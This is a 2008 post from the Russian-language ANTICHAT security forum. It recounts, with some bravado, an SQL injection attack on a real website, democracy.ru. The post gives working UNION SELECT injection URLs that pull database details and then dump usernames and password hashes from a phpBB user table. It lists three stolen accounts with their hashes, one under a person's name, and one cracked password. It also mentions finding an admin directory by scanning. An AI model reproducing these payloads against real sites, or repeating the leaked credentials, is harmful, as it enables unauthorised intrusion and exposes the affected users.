ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
05.09.2008, 20:04
|
|
Познающий
Регистрация: 07.08.2006
Сообщений: 66
Провел на форуме:
2256830
Репутация:
94
|
|
Сообщение от Twoster
http://www.democracy.ru/print.php?id=-1+union+select+1,2,user(),4,database(),6,7,8,9,10, 11,12,13,14,15/*
Итак приступим.
Версия 5 на серве стоит пошарив по сайту нашел пхпббшный форум так что иньекция была проведена буквально за пару секунд запросом
Код:
http://www.democracy.ru/print.php?id=-1+union+select+1,2,concat_ws(0x3a,username,user_password),4,5,6,7,8,9,10,11,12,13,14,15+from+phpbb_users+limit+1,1/*
Откуда посыпались акки как переспелые мандарины с дерева ))) взял я все три акка которые были в базе и моим уловом стал
Andrey:2c44e4b135929e56f778fadc97077465
Елена Алексеенко:ffae0a5ec97c310be6bb424a35d03 cfc
Kremniov:c4ca4238a0b923820dcc509a6f75849b
Начал проганять хеши через сервисы и только последний был взломан
Kremniov:1
попробовав пробить форум на login.php или admin.php я получил кулаком в лоб ни то ни другое не было найдено в дело пошел сканнер и выдал чтото в виде
Код:
http://www.democracy.ru/admin/
но и тут меня ждало разочарование юзалась примитивная basic аутидентификация ни логин ни пароль от того что имелось не было...
А с форумом меня радости не ждало т.к. логин страница была удалена (и нафига им это хотя у них весь форум в спаме...)
P.S.Также я прошелся по таблицам в поисках чего нибудь вкусного сразу говорю ниче интересного вы там не найдете (150 таблиц всякого мусора )))
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Древовидный вид